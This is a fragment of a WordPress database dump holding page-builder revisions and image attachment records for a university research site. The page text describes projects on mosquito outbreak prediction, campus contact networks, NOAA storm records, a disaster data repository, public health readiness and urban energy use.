Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2022-04-18 11:51:02','2022-04-18 15:51:02','',438,'https://gsudice.dataconn.net/?p=1164',0,'revision','',0),(1187,1,'2022-04-22 10:01:42','2022-04-22 14:01:42','','388de91c055c0831e049331d9ba8335e','','inherit','open','closed','','388de91c055c0831e049331d9ba8335e','','','2022-04-22 10:01:42','2022-04-22 14:01:42','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/388de91c055c0831e049331d9ba8335e.jpg',0,'attachment','image/jpeg',0),(1188,1,'2022-04-22 10:01:52','2022-04-22 14:01:52','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-388de91c055c0831e049331d9ba8335e-scaled-1.jpg','cropped-388de91c055c0831e049331d9ba8335e-scaled-1.jpg','','inherit','open','closed','','cropped-388de91c055c0831e049331d9ba8335e-scaled-1-jpg','','','2022-04-22 10:01:52','2022-04-22 14:01:52','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-388de91c055c0831e049331d9ba8335e-scaled-1.jpg',0,'attachment','image/jpeg',0),(1197,1,'2022-04-22 11:00:11','2022-04-22 15:00:11','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c4\",\"parentId\":\"126-c3\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c4\",\"index\":0,\"id\":\"126-c5\",\"partialId\":126,\"styleRef\":342,\"type\":\"content\",\"props\":{\"content\":\"AeMos: An Early Warning Systems for Aedes Mosquito Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c4\",\"index\":2,\"id\":\"126-c6\",\"partialId\":126,\"styleRef\":344,\"type\":\"content\",\"props\":{\"content\":\"<p>The Aedes Mosquito is a prolific vector for diseases and can cause severe outbreaks that heavily affect human populations and overwhelm healthcare systems. Outbreaks of these diseases can often be traced back to climate patterns that are favorable for mosquito population growth. Predicting these outbreaks early is essential to positioning supplies in order to help those who will be infected. There currently lacks an Early Warning Systems (EWSs) in many parts of the globe that would heavily benefit from one. We endeavor to create an EWS that is applicable to estimate Aedes mosquito population spikes wherever there are Aedes mosquitoes.<\\/p>\"}}],\"styleRef\":341,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c7\",\"parentId\":\"126-c3\",\"partialId\":126,\"styleRef\":345,\"type\":\"content\"}],\"id\":\"126-c3\",\"parentId\":\"126-c2\",\"partialId\":126,\"styleRef\":340,\"type\":\"content\"}],\"id\":\"126-c2\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":339,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, and hybrid is similar to our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events & corresponding response and recovery efforts. <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2022-04-22 11:00:11','2022-04-22 15:00:11','',438,'https://gsudice.dataconn.net/?p=1197',0,'revision','',0),(1204,1,'2022-04-22 11:16:53','2022-04-22 15:16:53','','Opherus','','inherit','open','closed','','opherus','','','2022-04-22 11:16:53','2022-04-22 15:16:53','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/Opherus.png',0,'attachment','image/png',0),(1205,1,'2022-04-22 11:17:07','2022-04-22 15:17:07','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Opherus.png','cropped-Opherus.png','','inherit','open','closed','','cropped-opherus-png','','','2022-04-22 11:17:07','2022-04-22 15:17:07','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Opherus.png',0,'attachment','image/png',0),(1207,1,'2022-04-22 11:17:17','2022-04-22 15:17:17','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c4\",\"parentId\":\"126-c3\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c4\",\"index\":0,\"id\":\"126-c5\",\"partialId\":126,\"styleRef\":342,\"type\":\"content\",\"props\":{\"content\":\"AeMos: An Early Warning Systems for Aedes Mosquito Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c4\",\"index\":2,\"id\":\"126-c6\",\"partialId\":126,\"styleRef\":344,\"type\":\"content\",\"props\":{\"content\":\"<p>The Aedes Mosquito is a prolific vector for diseases and can cause severe outbreaks that heavily affect human populations and overwhelm healthcare systems. Outbreaks of these diseases can often be traced back to climate patterns that are favorable for mosquito population growth. Predicting these outbreaks early is essential to positioning supplies in order to help those who will be infected. There currently lacks an Early Warning Systems (EWSs) in many parts of the globe that would heavily benefit from one. We endeavor to create an EWS that is applicable to estimate Aedes mosquito population spikes wherever there are Aedes mosquitoes.<\\/p>\"}}],\"styleRef\":341,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c7\",\"parentId\":\"126-c3\",\"partialId\":126,\"styleRef\":345,\"type\":\"content\"}],\"id\":\"126-c3\",\"parentId\":\"126-c2\",\"partialId\":126,\"styleRef\":340,\"type\":\"content\"}],\"id\":\"126-c2\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":339,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, and hybrid is similar to our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events & corresponding response and recovery efforts. <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2022-04-22 11:17:17','2022-04-22 15:17:17','',438,'https://gsudice.dataconn.net/?p=1207',0,'revision','',0),(1221,1,'2022-04-29 00:53:21','2022-04-29 04:53:21','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-headshot-1.jpg','headshot-1.jpg','','inherit','open','closed','','cropped-cropped-cropped-headshot-1-jpg','','','2023-10-03 15:57:57','2023-10-03 19:57:57','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-headshot-1.jpg',0,'attachment','image/jpeg',0),(1224,1,'2022-04-29 01:20:54','2022-04-29 05:20:54','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Features\",\"attrs\":{\"id\":\"features\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c4\",\"parentId\":\"453-c3\",\"partialId\":453,\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"30\"}}}}}}},\"id\":\"453-c6\",\"parentId\":\"453-c5\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c6\",\"index\":0,\"id\":\"453-c7\",\"partialId\":453,\"styleRef\":673,\"type\":\"content\",\"props\":{\"name\":\"icons8-line-awesome\\/connectdevelop\",\"link\":{\"value\":\"\"}}}],\"styleRef\":672,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"80.60\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"70\"}}}}}}},\"id\":\"453-c8\",\"parentId\":\"453-c5\",\"partialId\":453,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"453-c8\",\"index\":0,\"id\":\"453-